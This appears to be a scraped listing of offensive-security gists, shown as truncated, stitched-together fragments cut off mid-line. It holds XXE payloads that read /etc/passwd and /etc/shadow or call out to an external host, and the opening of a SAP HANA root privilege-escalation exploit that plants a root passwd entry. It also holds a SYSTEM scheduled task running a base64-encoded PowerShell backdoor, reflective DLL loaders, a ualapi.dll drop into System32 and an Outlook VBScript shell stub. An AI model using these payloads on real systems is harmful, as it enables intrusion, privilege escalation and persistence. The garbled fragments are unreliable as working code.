S3cur3Th1sSh1t / PowerView-3.0-tricks.ps1
Created June 30, 2017 07:00 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
--------------------------------------------------------------
Vanilla payload, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    # Thin wrapper around PyCryptodome's AES-CBC decryption
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        # Returns the raw decrypted bytes; padding is not removed here
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)
S3cur3Th1sSh1t / CVE-2019-0357 - SAP-HANA root
Created February 6, 2020 08:04
CVE-2019-0357 - SAP-HANA root privesc vuln
import os
import signal
import sys
ATTEMPTS = (100 * 1000)
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
$confirmpreference = "none"
function Get-ScheduledTaskSystem
{
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG
function reflectit
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE into the PowerShell process,
or it can reflectively load a DLL into a remote process. These modes have different parameters and constraints;
please read the Notes section (GENERAL NOTES) for information on how to use them.
1.) Reflectively loads a DLL or EXE into the memory of the PowerShell process.
function Ualapi
{
    Write-Host "Dropping ualapi.dll in System32 Folder..."
    if ([Environment]::Is64BitProcess)
    {
        [IO.File]::WriteAllBytes("C:\Windows\System32\ualapi.dll",[Convert]::FromBase64String("
function GetWinLogonTokenSystem
{
function reflectbin
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE into the PowerShell process,
or it can reflectively load a DLL into a remote process. These modes have different parameters and constraints,